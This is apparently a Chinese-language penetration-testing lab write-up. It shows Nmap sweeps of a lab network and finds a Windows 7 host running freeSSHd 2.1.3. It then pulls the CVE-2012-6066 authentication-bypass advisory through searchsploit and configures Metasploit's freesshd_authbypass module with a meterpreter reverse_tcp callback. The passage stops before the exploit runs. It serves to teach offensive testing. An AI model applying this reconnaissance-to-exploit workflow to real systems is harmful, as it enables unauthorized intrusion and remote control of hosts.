windows 的話查名稱是445 port。
PORT STATE SERVICE VERSION
445/tcp filtered microsoft-ds
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 ...
2 61.64 ms 172.16.1.51
Nmap scan report for 172.16.1.67
Host is up (0.024s latency).
PORT STATE SERVICE VERSION
445/tcp closed microsoft-ds
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 59.26 ms 192.168.200.1
2 65.18 ms 172.16.1.67
Nmap scan report for 172.16.1.87
Host is up (0.037s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (94%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (94%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (94%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (93%), Microsoft Windows Server 2008 R2 or Windows 8 (93%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (93%), Microsoft Windows 7 SP1 (93%), Microsoft Windows 7 or Windows Server 2008 R2 (93%), Microsoft Windows Server 2008 or 2008 Beta 3 (93%), Microsoft Windows Server 2008 R2 or Windows 8.1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: SEH-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -2h40m01s, deviation: 4h37m07s, median: -2s
| smb2-time:
| date: 2023-02-25T11:05:28
|_ start_date: 2023-02-25T10:01:44
| smb-os-discovery:
| OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: SEH-PC
| NetBIOS computer name: SEH-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-02-25T19:05:22+08:00
| smb2-security-mode:
| 210:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: SEH-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00155d013683 (Microsoft)
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
- Hop 1 is the same as for 172.16.1.67
2 65.23 ms 172.16.1.87
Nmap scan report for 172.16.1.105
Host is up (0.040s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (94%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (94%), Microsoft Windows Server 2012 R2 (94%), Tomato 1.27 - 1.28 (Linux 2.4.20) (91%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (89%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (89%), Microsoft Windows 7 Professional (89%), Microsoft Windows Vista SP2 (89%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: WIN-FH0N2VGINDJ, NetBIOS user: <unknown>, NetBIOS MAC: 00155d2de792 (Microsoft)
| smb2-time:
| date: 2023-02-25T11:05:40
|_ start_date: 2021-05-28T17:04:49
| smb2-security-mode:
| 302:
|_ Message signing enabled but not required
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
- Hop 1 is the same as for 172.16.1.67
2 65.18 ms 172.16.1.105
Nmap scan report for 172.16.1.112
Host is up (0.040s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2016 (94%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%), Microsoft Windows 10 1607 (89%), Microsoft Windows Server 2012 (88%), Microsoft Windows Server 2008 R2 (88%), Microsoft Windows 7 Professional (86%), Microsoft Windows Server 2012 Data Center (85%), Tomato 1.27 - 1.28 (Linux 2.4.20) (85%), Microsoft Windows 10 1511 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
| smb2-time:
| date: 2023-02-25T11:05:42
|_ start_date: 2022-10-15T07:48:25
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
- Hop 1 is the same as for 172.16.1.67
2 65.23 ms 172.16.1.112
Nmap scan report for 172.16.1.120
Host is up (0.041s latency).
PORT STATE SERVICE VERSION
445/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (94%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 3.10 - 3.16 (93%), Linux 3.16 (92%), Linux 3.13 (91%), Linux 3.18 (90%), Linux 4.0 (90%), Linux 3.10 - 3.12 (89%), Linux 3.10 - 4.11 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: FULECMS
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: FULECMS, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
|_clock-skew: mean: -2h39m59s, deviation: 4h37m03s, median: -2s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2023-02-25T11:05:28
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
| Computer name: fulecms
| NetBIOS computer name: FULECMS\x00
| Domain name: \x00
| FQDN: fulecms
|_ System time: 2023-02-25T19:05:29+08:00
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
- Hop 1 is the same as for 172.16.1.67
2 65.23 ms 172.16.1.120
Nmap scan report for 172.16.1.134
Host is up (0.032s latency).
PORT STATE SERVICE VERSION
445/tcp closed microsoft-ds
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
- Hop 1 is the same as for 172.16.1.67
2 65.24 ms 172.16.1.134
Nmap scan report for hr.itop.com.tw (172.16.1.153)
Host is up (0.026s latency).
PORT STATE SERVICE VERSION
445/tcp closed microsoft-ds
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 ...
2 65.25 ms hr.itop.com.tw (172.16.1.153)
Nmap scan report for 172.16.1.157
Host is up (0.030s latency).
PORT STATE SERVICE VERSION
445/tcp filtered microsoft-ds
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 ...
2 58.92 ms 172.16.1.157
Nmap scan report for 172.16.1.191
Host is up (0.042s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Windows Server 2016 Datacenter 14393 microsoft-ds
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2016 (94%), Microsoft Windows 10 1607 (90%), Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%), Microsoft Windows Server 2008 R2 (88%), Microsoft Windows 10 1511 - 1607 (86%), Microsoft Windows 7 Professional (86%), Microsoft Windows 7 SP1 (85%), Tomato 1.27 - 1.28 (Linux 2.4.20) (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-02-25T11:05:40
|_ start_date: 2023-02-25T10:01:56
|_clock-skew: mean: -2h39m56s, deviation: 4h36m59s, median: -1s
| smb-os-discovery:
| OS: Windows Server 2016 Datacenter 14393 (Windows Server 2016 Datacenter 6.3)
| Computer name: WinPower
| NetBIOS computer name: WINPOWER\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-02-25T19:05:37+08:00
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 ...
2 65.25 ms 172.16.1.191
Nmap scan report for 172.16.1.222
Host is up (0.033s latency).
PORT STATE SERVICE VERSION
445/tcp closed microsoft-ds
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 ...
2 66.53 ms 172.16.1.222
Nmap scan report for 172.16.3.124
Host is up (0.048s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Windows Server 2016 Essentials 14393 microsoft-ds (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (87%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: WIN-56MI46O6T68; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows Server 2016 Essentials 14393 (Windows Server 2016 Essentials 6.3)
| Computer name: WIN-56MI46O6T68
| NetBIOS computer name: WIN-56MI46O6T68\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-02-25T19:05:35+08:00
| smb2-time:
| date: 2023-02-25T11:05:33
|_ start_date: 2022-11-01T06:49:25
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -2h39m56s, deviation: 4h37m00s, median: -1s
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 ...
2 58.91 ms 172.16.3.124
Nmap scan report for 172.16.3.125
Host is up (0.024s latency).
PORT STATE SERVICE VERSION
445/tcp closed microsoft-ds
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
- Hop 1 is the same as for 172.16.1.67
2 59.99 ms 172.16.3.125
Nmap scan report for 172.16.3.126
Host is up (0.033s latency).
PORT STATE SERVICE VERSION
445/tcp closed microsoft-ds
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 ...
2 113.14 ms 172.16.3.126
Nmap scan report for 172.16.3.128
Host is up (0.041s latency).
PORT STATE SERVICE VERSION
445/tcp closed microsoft-ds
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 ...
2 113.12 ms 172.16.3.128
Nmap scan report for 172.16.5.1
Host is up (0.033s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|WAP
Running (JUST GUESSING): Microsoft Windows XP|2012|2016|7|2008 (86%), Linux 2.4.X|3.X (85%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_7 cpe:/o:linux:linux_kernel:3.18 cpe:/o:microsoft:windows_server_2008::beta3 cpe:/o:microsoft:windows_server_2008
Aggressive OS guesses: Microsoft Windows XP SP3 (86%), Tomato 1.27 - 1.28 (Linux 2.4.20) (85%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%), Microsoft Windows 7 (85%), Linux 3.18 (85%), Microsoft Windows Server 2008 or 2008 Beta 3 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
|_clock-skew: -1s
| smb2-time:
| date: 2023-02-25T11:05:24
|_ start_date: N/A
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
- Hop 1 is the same as for 172.16.1.67
2 113.07 ms 172.16.5.1
Nmap scan report for 172.16.19.2
Host is up (0.046s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (94%), Microsoft Windows 7 SP1 (94%), Microsoft Windows 7 or Windows Server 2008 R2 (94%), Microsoft Windows Server 2008 or 2008 Beta 3 (94%), Microsoft Windows Server 2008 R2 or Windows 8.1 (94%), Microsoft Windows 7 (94%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (94%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (94%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (94%), Microsoft Windows Vista SP2 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: IRMA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 210:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-02-25T11:05:43
|_ start_date: 2021-05-22T09:26:30
|_nbstat: NetBIOS name: IRMA, NetBIOS user: <unknown>, NetBIOS MAC: 00155d2de7b6 (Microsoft)
|_clock-skew: mean: -2h39m54s, deviation: 4h36m55s, median: -2s
| smb-os-discovery:
| OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: IRMA
| NetBIOS computer name: IRMA\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-02-25T19:05:43+08:00
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 ...
2 113.04 ms 172.16.19.2
Nmap scan report for 172.16.19.9
Host is up (0.045s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (94%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (94%), Microsoft Windows Server 2012 R2 (94%), Tomato 1.27 - 1.28 (Linux 2.4.20) (91%), Microsoft Windows 7 Professional (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2012 Data Center (90%), Microsoft Windows 7 SP1 (90%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 or 2008 Beta 3 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: FRANKLIN, NetBIOS user: <unknown>, NetBIOS MAC: 00155d013681 (Microsoft)
| smb2-security-mode:
| 302:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-02-25T11:05:43
|_ start_date: 2023-02-25T10:01:49
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 ...
2 113.01 ms 172.16.19.9
Nmap scan report for 172.16.20.3
Host is up (0.029s latency).
PORT STATE SERVICE VERSION
445/tcp closed microsoft-ds
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 ...
2 112.98 ms 172.16.20.3
Nmap scan report for 172.16.20.6
Host is up (0.030s latency).
PORT STATE SERVICE VERSION
445/tcp closed microsoft-ds
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
- Hop 1 is the same as for 172.16.1.67
2 112.95 ms 172.16.20.6
Nmap scan report for 172.16.20.7
Host is up (0.043s latency).
PORT STATE SERVICE VERSION
445/tcp closed microsoft-ds
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 ...
2 112.91 ms 172.16.20.7
Post-scan script results:
| clock-skew:
| -1s:
| 172.16.5.1
| 172.16.1.191
| 172.16.19.9
| 172.16.3.124
| -2h39m54s:
| 172.16.19.2
| 172.16.1.87
| 172.16.1.120
| 172.16.1.112
|_ 172.16.1.105
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 5120 IP addresses (21 hosts up) scanned in 108.37 seconds
這裡節錄第一小題答案:
Nmap scan report for 172.16.19.2
Service Info: Host: IRMA;
第二小題:
┌──(kali㉿kali)-[~]
└─$ sudo nmap 172.16.19.2
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-25 06:24 EST
Nmap scan report for 172.16.19.2
Host is up (0.027s latency).
Not shown: 990 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5357/tcp open wsdapi
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49158/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds
以上沒帶參數,會掃最常見1000個port。如果帶-F參數,則是最常見10個。而剛剛的題目如果帶-F參數,會少掉49158 port沒掃到。
┌──(kali㉿kali)-[~]
└─$ sudo nmap 172.16.19.2 -p-
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-25 06:41 EST
Nmap scan report for 172.16.19.2
Host is up (0.058s latency).
Not shown: 65524 closed tcp ports (reset)
PORT STATE SERVICE
45/tcp open mpm
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5357/tcp open wsdapi
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49158/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 28.48 seconds
用了-p-參數則會掃1-65535全部,可以發現多了45。而且要考慮到連線port偽裝,比如把遠端連線變成49156 port。
再針對掃出來的port仔細掃描:
┌──(root㉿kali)-[~]
└─# nmap 172.16.19.2 -p45,135,139,445,5357,49152-49158 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-25 06:49 EST
Nmap scan report for 172.16.19.2
Host is up (0.016s latency).
PORT STATE SERVICE VERSION
45/tcp open ssh WeOnlyDo sshd 2.1.3 (protocol 2.0)
| ssh-hostkey:
| 1024 69f2238e737a37f87cea4da210d3be7c (DSA)
|_ 1024 2e45fe263a9233c31fc19de2991792c5 (RSA)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp closed unknown
49158/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=2/25%OT=45%CT=49157%CU=43302%PV=Y%DS=2%DC=T%G=Y%TM=63F
OS:9F5FE%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10A%TI=I%TS=7)OPS(O1=M5
OS:07NW8ST11%O2=M507NW8ST11%O3=M507NW8NNT11%O4=M507NW8ST11%O5=M507NW8ST11%O
OS:6=M507ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%D
OS:F=Y%T=80%W=2000%O=M507NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0
OS:%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T
OS:6(R=N)T7(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%R
OS:UD=G)IE(R=N)
Network Distance: 2 hops
Service Info: Host: IRMA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-02-25T11:50:16
|_ start_date: 2021-05-22T09:26:30
|_clock-skew: mean: -2h40m01s, deviation: 4h37m07s, median: -2s
| smb2-security-mode:
| 210:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: IRMA
| NetBIOS computer name: IRMA\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-02-25T19:50:16+08:00
|_nbstat: NetBIOS name: IRMA, NetBIOS user: <unknown>, NetBIOS MAC: 00155d2de7b6 (Microsoft)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
TRACEROUTE (using port 49157/tcp)
HOP RTT ADDRESS
1 65.35 ms 192.168.200.1
2 12.89 ms 172.16.19.2
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.01 seconds
可以發現45從mpm變成ssh。 WeOnlyDo sshd 2.1.3可以稱之為banner,可以google一下有沒有弱點。
根據EDB-ID,用searchsploit來查詢漏洞詳情。其實用上圖的網頁也是一樣的內容,但用command line就是比較潮比較專業比較駭客。
┌──(root㉿kali)-[~]
└─# searchsploit 23080
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
freeSSHd 2.1.3 - Remote Authentication Bypass | windows/remote/23080.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root㉿kali)-[~]
└─# mkdir PT_day2
┌──(root㉿kali)-[~]
└─# cd PT_day2
┌──(root㉿kali)-[~/PT_day2]
└─# searchsploit -m 23080
Exploit: freeSSHd 2.1.3 - Remote Authentication Bypass
URL: https://www.exploit-db.com/exploits/23080
Path: /usr/share/exploitdb/exploits/windows/remote/23080.txt
Codes: CVE-2012-6066, OSVDB-88006
Verified: True
File Type: ASCII text
Copied to: /root/PT_day2/23080.txt
┌──(root㉿kali)-[~/PT_day2]
└─# ls -al
total 12
drwxr-xr-x 2 root root 4096 Feb 25 19:55 .
drwx------ 5 root root 4096 Feb 25 19:55 ..
-rw-r--r-- 1 root root 913 Feb 25 19:55 23080.txt
┌──(root㉿kali)-[~/PT_day2]
└─# cat 23080.txt
FreeSSHD all version Remote Authentication Bypass ZERODAY
Discovered & Exploited by Kingcope
Year 2011
# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23080.zip
Run like:
ssh.exe -l<valid username> <host>
valid username might be:
root
admin
administrator
webadmin
sysadmin
netadmin
guest
user
web
test
ssh
sftp
ftp
or anything you can imagine.
The vulnerable banner of the most recent version is:
SSH-2.0-WeOnlyDo 2.1.3
For your pleasure,
KingcopeFreeSSHD all version Remote Authentication Bypass ZERODAY
Discovered & Exploited by Kingcope
Year 2011
Run like:
ssh.exe -l<valid username> <host>
valid username might be:
root
admin
administrator
webadmin
sysadmin
netadmin
guest
user
web
test
ssh
sftp
ftp
or anything you can imagine.
The vulnerable banner of the most recent version is:
SSH-2.0-WeOnlyDo 2.1.3
For your pleasure,
Kingcope
呃呃...好像看不太懂,沒關係,看看metasploit有沒有poc可以直接用:
┌──(root㉿kali)-[~/PT_day2]
└─# msfconsole
.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO. .oOOOOoOOOOl. ,OOOOOOOOo
dOOOOOOOO. .cOOOOOc. ,OOOOOOOOx
lOOOOOOOO. ;d; ,OOOOOOOOl
.OOOOOOOO. .; ; ,OOOOOOOO.
cOOOOOOO. .OOc. 'oOO. ,OOOOOOOc
oOOOOOO. .OOOO. :OOOO. ,OOOOOOo
lOOOOO. .OOOO. :OOOO. ,OOOOOl
;OOOO' .OOOO. :OOOO. ;OOOO;
.dOOo .OOOOocccxOOOO. xOOd.
,kOl .OOOOOOOOOOOOO. .dOk,
:kk;.OOOOOOOOOOOOO.cOk:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.
=[ metasploit v6.3.2-dev ]
+ -- --=[ 2290 exploits - 1201 auxiliary - 409 post ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Use help <command> to learn more
about any command
Metasploit Documentation: https://docs.metasploit.com/
msf6 >
找找看:
msf6 > search freessh
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/ssh/freeftpd_key_exchange 2006-05-12 average No FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow
1 exploit/windows/ssh/freesshd_key_exchange 2006-05-12 average No FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow
2 exploit/windows/ssh/freesshd_authbypass 2010-08-11 excellent Yes Freesshd Authentication Bypass
Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/ssh/freesshd_authbypass
看起來應該是第3個,所以use 2。
msf6 > use 2
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/ssh/freesshd_authbypass) >
來看看該怎麼設定,所以show options:
msf6 exploit(windows/ssh/freesshd_authbypass) > show options
Module options (exploit/windows/ssh/freesshd_authbypass):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://
docs.metasploit.com/docs/using-m
etasploit/basics/using-metasploi
t.html
RPORT 22 yes The target port (TCP)
SSL false no Negotiate SSL for incoming conne
ctions
SSLCert no Path to a custom SSL certificate
(default is randomly generated)
URIPATH no The URI to use for this exploit
(default is random)
USERNAME no A specific username to try
USER_FILE /usr/share/metasploi yes File containing usernames, one p
t-framework/data/wor er line
dlists/unix_users.tx
t
When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to
listen on. This must be an address on t
he local machine or 0.0.0.0 to listen o
n all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thr
ead, process, none)
LHOST 192.168.18.192 yes The listen address (an interface may b
e specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 PowerShell
View the full module info with the info, or info -d command.
要注意LHOST,到底是要用本機IP還是跳VPN後的IP?
圖解2:
看看現在的IP:
┌──(kali㉿kali)-[~]
└─$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:79:3c:84 brd ff:ff:ff:ff:ff:ff
inet 192.168.18.192/24 brd 192.168.18.255 scope global dynamic noprefixroute eth0
valid_lft 2547sec preferred_lft 2547sec
inet6 fe80::9977:207f:3a78:867f/64 scope link noprefixroute
valid_lft forever preferred_lft forever
10: tun1: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 192.168.200.3/24 scope global tun1
valid_lft forever preferred_lft forever
